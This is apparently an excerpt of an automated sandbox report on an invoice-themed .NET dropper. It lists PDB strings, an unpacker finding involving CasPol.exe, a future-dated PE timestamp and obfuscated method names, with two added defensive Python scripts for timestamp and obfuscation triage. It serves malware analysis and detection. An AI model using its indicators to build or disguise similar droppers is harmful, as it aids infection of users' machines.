        Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rsaenh.pdbO source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdbG source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: diasymreader.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: rtutils.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.925195088.00000000042BD000.00000004.00000001.sdmp, AdvancedRun.exe, 00000003.00000000.674869735.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp, svchost.exe, 0000000C.00000002.955492913.00000000043C9000.00000004.00000001.sdmp, svchost.exe, 00000013.00000002.965974151.0000000006601000.00000004.00000001.sdmp
        Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: System.Drawing.pdb] source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: clrjit.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wUxTheme.pdbI source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: dhcpcsvc.pdbi source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: rasman.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: propsys.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: msvcr120_clr0400.i386.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Configuration.ni.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: version.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Xml.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.pdb source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.981409215.0000000009040000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdbm source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: rtutils.pdbs source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: npNiVisualBasic.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.849394343.0000000000F89000.00000004.00000010.sdmp
        Source: Binary string: System.Configuration.ni.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000011.00000003.773634212.0000000004AC0000.00000004.00000040.sdmp
        Source: Binary string: cfgmgr32.pdbE source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: CN-Invoice-XXXXX9808-19011143287994.exe, 00000000.00000002.854230028.000000000123D000.00000004.00000020.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000011.00000003.772689514.0000000004AF1000.00000004.00000001.sdmp
        Source: Binary string: cldapi.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000011.00000003.733692999.00000000029E6000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: mscoreei.pdb source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: System.Drawing.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: combase.pdbk source: WerFault.exe, 00000011.00000003.772531708.0000000004AC7000.00000004.00000040.sdmp
        Source: Binary string: System.Core.pdb source: WerFault.exe, 00000011.00000003.772909013.0000000004ADC000.00000004.00000001.sdmp
        Source: Binary string: System.Windows.Forms.pdb{ source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.Windows.Forms.pdbx source: WerFault.exe, 00000011.00000002.843527236.0000000004D70000.00000004.00000001.sdmp
        Source: Binary string: OneCoreUAPCommonProxyStub.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdbk source: WerFault.exe, 00000011.00000003.772013885.0000000004AC2000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 00000011.00000003.773760878.0000000004ACA000.00000004.00000040.sdmp
        Source: Binary string: System.ni.pdb source: WerFault.exe, 00000011.00000003.772873228.0000000004B08000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdbA source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp
        Source: Binary string: edputil.pdb source: WerFault.exe, 00000011.00000003.771759665.0000000004ACE000.00000004.00000040.sdmp

        Data Obfuscation:

        .NET source code contains potential unpacker
        Source: 13.2.CasPol.exe.400000.0.unpack, #=qjIje6jGWLd2EOkfZXKqBbg==.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: 13.2.CasPol.exe.400000.0.unpack, #=qxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecU=.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Binary contains a suspicious time stamp
        Source: initial sample Static PE information: 0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]
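The timestamp finding above can be reproduced without a sandbox. The Python below is an added example, not code from the report, the sandbox or the sample: it reads the COFF TimeDateStamp straight from the PE headers, renders it in the report's own format, and classifies it against the time the analysis ran. The analysis date it compares against, the 1993 lower bound and the stub PE header it parses are all assumptions constructed for the example. One caveat a practitioner should keep in mind: a value past 2038 (high bit set) is also exactly what a Roslyn deterministic build emits, since that mode writes a hash of the compilation into the field rather than a date, so this indicator corroborates the other findings here rather than standing on its own.

```python
"""Check a PE file's link timestamp for the anomaly the report flags.

Added example; not part of the sandbox report or of the sample. Pass a file
path on the command line, or run without arguments to check a constructed
stub header carrying the value reported for the initial sample.
"""
import struct
import sys
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
# Assumption: the date the sandbox run took place. Replace with the real run time.
ANALYSIS_TIME = datetime(2021, 2, 17, tzinfo=timezone.utc)
# Assumption: nothing Win32 was linked before 1993, so earlier dates are as odd as future ones.
EARLIEST_PLAUSIBLE = datetime(1993, 1, 1, tzinfo=timezone.utc)


def pe_timestamp(data: bytes) -> int:
    """Return the COFF header TimeDateStamp of a PE image held in memory."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header follows the 4-byte signature: Machine(2), NumberOfSections(2), TimeDateStamp(4), ...
    (stamp,) = struct.unpack_from("<I", data, e_lfanew + 8)
    return stamp


def format_stamp(stamp: int) -> str:
    """Render the stamp the way the report does, e.g. '0xE5412A60 [Sun Nov 18 19:39:12 2091 UTC]'."""
    when = EPOCH + timedelta(seconds=stamp)  # works past 2038 on every platform
    return f"0x{stamp:08X} [{when.strftime('%a %b %d %H:%M:%S %Y')} UTC]"


def assess_stamp(stamp: int, analysis_time: datetime = ANALYSIS_TIME) -> dict:
    """Flag link times that are in the future, pre-Win32, or carry the high bit."""
    when = EPOCH + timedelta(seconds=stamp)
    reasons = []
    if when > analysis_time:
        reasons.append("link time is after the analysis time")
    if when < EARLIEST_PLAUSIBLE:
        reasons.append("link time predates Win32")
    if stamp & 0x80000000:
        # Also what Roslyn /deterministic builds write (a compilation hash with the
        # high bit set), so treat as corroborating rather than conclusive.
        reasons.append("high bit set: timestomped or deterministic-build hash")
    return {"stamp": stamp, "utc": when.isoformat(), "suspicious": bool(reasons), "reasons": reasons}


def build_stub_pe(stamp: int) -> bytes:
    """Constructed minimal MZ + PE/COFF header with no sections, only to exercise the parser."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, len(dos))  # e_lfanew points just past the DOS header
    # Machine=I386, 3 sections, stamp, no symbols, PE32 optional header size, EXECUTABLE_IMAGE|32BIT
    coff = struct.pack("<HHIIIHH", 0x014C, 3, stamp, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + b"PE\0\0" + coff


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            image = fh.read()
    else:
        image = build_stub_pe(0xE5412A60)  # value the report gives for the initial sample
    ts = pe_timestamp(image)
    print(format_stamp(ts))
    print(assess_stamp(ts))
```

Run against the stub, the script prints the same string the report shows and two reasons: the date lies after the analysis and the high bit is set. A normal 2020 link time from the same tool produces no reasons at all, which is the comparison worth making before calling a sample timestomped.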
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
        Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe Code function: 0_2_08A27150 pushfd ; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 3_2_0040B50D push ecx; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 4_2_0040B550 push eax; ret
        Source: C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe Code function: 4_2_0040B50D push ecx; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_033CF580 pushad ; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_03464280 pushad ; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0346D7B1 push 000000C3h; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0346D6F0 push 000000C3h; ret
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04E0F0D4 push 850FD83Bh; ret
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Code function: 12_2_06C257F0 pushfd ; ret
        Source: C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe Code function: 19_2_00AC57F0 pushfd ; ret
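The "High entropy of concatenated method names" entries that follow report the same four obfuscated classes in the dropper, the dropped svchost.exe copy and every unpacked memory image, plus a differently renamed payload in CasPol.exe. The Python below is an added example, not the sandbox's scoring code: it reproduces the entropy measurement over method names copied from the entries below and adds a second signal, the share of names that no C# compiler would accept from source (the `#=q` prefix in the CasPol.exe names is ConfuserEx's renaming scheme). The thresholds and the benign baseline list are constructed assumptions for the example.

```python
"""Triage heuristic for obfuscated .NET method names.

Added example; not code from the report, the sandbox or the sample. Scores the
method names of one type with two signals:
  1. Shannon entropy (bits per character) of the concatenated names, the
     quantity behind the report's "High entropy of concatenated method names".
  2. The share of names that are not legal C# identifiers, which catches
     renamers whose output cannot have come from source.
Thresholds are the author's assumptions, not the sandbox's.
"""
import math
import re
from collections import Counter

# Copied from the report's first obfuscated class (AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI).
OBFUSCATED_NAMES = [
    ".ctor", "ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ", "VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh",
    "otxYxTbXdMEpIuBMOugakdZEldQGRTNhj", "SYEuyrjMYlp", "eYHpOCKsbnj",
    "uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV",
    "IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl",
    "DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi",
    "OaFeRzpMSiJQgGzKUzSVXbnvNHy",
]
# Copied from the 13.2.CasPol.exe entry (first four names).
SYMBOL_NAMES = [
    "#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=",
    "#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=",
    "#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq",
    "#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=",
]
# Constructed baseline of ordinary names; not taken from the sample.
BENIGN_NAMES = [
    ".ctor", "Initialize", "Connect", "SendHeartbeat", "ReceiveCommand",
    "GetConfiguration", "Dispose", "OnTimerElapsed", "WriteLog", "LoadPlugin",
]

# Names the runtime defines; every class has them, so they carry no signal.
RUNTIME_NAMES = {".ctor", ".cctor"}
# Plain C# identifier ('@' verbatim prefix allowed; Unicode letter classes omitted for brevity).
CSHARP_IDENT = re.compile(r"^@?[A-Za-z_][A-Za-z0-9_]*$")

ENTROPY_THRESHOLD = 5.0   # bits/char; ordinary English-derived names land around 4.0-4.7
INVALID_THRESHOLD = 0.5   # fraction of names that could not have been typed in source


def shannon_entropy(text: str) -> float:
    """Plug-in Shannon entropy of the character distribution, in bits per character."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def user_names(names):
    return [n for n in names if n not in RUNTIME_NAMES]


def invalid_identifier_ratio(names) -> float:
    user = user_names(names)
    if not user:
        return 0.0
    return sum(1 for n in user if not CSHARP_IDENT.match(n)) / len(user)


def assess_type(names) -> dict:
    """Score one type's method names; 'obfuscated' is True when either signal fires."""
    entropy = shannon_entropy("".join(user_names(names)))
    invalid = invalid_identifier_ratio(names)
    reasons = []
    if entropy >= ENTROPY_THRESHOLD:
        reasons.append(f"name entropy {entropy:.2f} bits/char")
    if invalid >= INVALID_THRESHOLD:
        reasons.append(f"{invalid:.0%} of names are not legal C# identifiers")
    return {"entropy": entropy, "invalid_ratio": invalid,
            "obfuscated": bool(reasons), "reasons": reasons}


if __name__ == "__main__":
    for label, names in [("sample class", OBFUSCATED_NAMES),
                         ("CasPol payload", SYMBOL_NAMES),
                         ("benign baseline", BENIGN_NAMES)]:
        print(f"{label:16} {assess_type(names)}")
```

The sample's names score about 5.6 bits per character, close to the 5.7 ceiling for uniformly random mixed-case letters, while the constructed baseline stays near 4.6; the CasPol.exe names are flagged by the identifier check regardless of entropy. Feeding a whole assembly's types through `assess_type` (for instance from dnlib or a `monodis` dump) gives a per-type list to compare against the report's entries.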
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: CN-Invoice-XXXXX9808-19011143287994.exe, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: svchost.exe.0.dr, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/AODZEGwanfkZGKWvOxVwRSKAhtZQhjcONlJOEMBbVyHgI.cs High entropy of concatenated method names: '.ctor', 'ZOIAuTDzvepzQwMhyaTeFgGQeEfNnQ', 'VbSZTfAXhrzpxlwCRrthPLYTuHbJqpyMh', 'otxYxTbXdMEpIuBMOugakdZEldQGRTNhj', 'SYEuyrjMYlp', 'eYHpOCKsbnj', 'uYSHYhxVTQizCwWspcXomSKAmwBRpjvgV', 'IEFCQtbpdryWzeTRkupeZXBosvBFGJvbDTRrPzJVZjAl', 'DMrIaePfbWLcqkvRvJxIdUWkbAuUGjaObcOIkXFBUpZGi', 'OaFeRzpMSiJQgGzKUzSVXbnvNHy'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ClozhVahMQiIfMWMokYSyGjWFqHhMP.cs High entropy of concatenated method names: 'MnmeUkqHYJrNM', 'IdSYiYMhvxsPV', 'XMUbhTkSpHBcsOxwAGZYwnriTExUfUdsdOfKzMfCMoswrV', '.ctor', '.cctor', 'ZCgSGCBYFhVDdAhNedpfjMtEUiqUOHZE', 'wvaPgZIGPTykPzhdkRhYCfnQM', 'nMtleQzWYHegXeHztSniPub', 'nJXzbrikdSmovLdZoQScWnT', 'crdLuCDyrsXuTZUWpWVTfRsdIPoTZCZqwewKYGNIzuVWxq'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/OYStTXRCRcNtDnwUJZlxjPavMKXcRQFbHOZtxzxYSQEcLXwqV.cs High entropy of concatenated method names: 'HPzugYXxHjZOLalisVzxBmzNzqZwtbM', '.ctor', 'ZBdlGdWMoyBPXceMwzRDTJuFb', 'LcfcyXihzOUbkbdNmKFqYQxRYXnfShyjUaQKPBtIyo', 'jKmxNPHZOodUFndzZlTtVNDbhdXCUeXqsjInMAj', 'ySsjfZvCHqBiOesvhkqKSfKq', 'NCvFQMybvVcvtVhIuVDCPBoRmgCjyGtNHTsxZXQ', 'EcgtipaOpjcxkBiBloEsKkpDPC', 'oNADKIxeYzIifBmrmawijmzrgiuFguN', 'DGanoMztZfDISdicgsXogGscoiwBoSXELf'
        Source: 0.2.CN-Invoice-XXXXX9808-19011143287994.exe.bf0000.0.unpack, WQjzlxmkKkNRyuBqBUSfpzbfVmUlGNdIxsVLpOSBriCM/ZwEGqUraAhVRiqfTlGekeFGjZJen.cs High entropy of concatenated method names: 'AQugAsFnExIlQlIPGiGqTXCXlQtuPuHQeAKMPrPKSp', '.ctor', 'iNtTClrjsBjTJDXrwjKoIKRpYryDQJLgiE', 'WQwQjQUVMzkJOqkAKOnvxWeVlNsIQdL', 'eGhVFZTtMXrfpChtpYWSUjzUsVYdgDdJgXKcF', 'fOtTIAEYGIFucKTk', 'QUhmCJbQnjTIYrSxqKTizbBYqtpyLAtPWgPDQcvNDGzGWao', 'idsRLPtiWjuLsBIASclcUAHxuWubsutazp', 'IhCelqvuTbkf', 'QfdXdNnDLtqOurPCQtmcTAXNRUH'
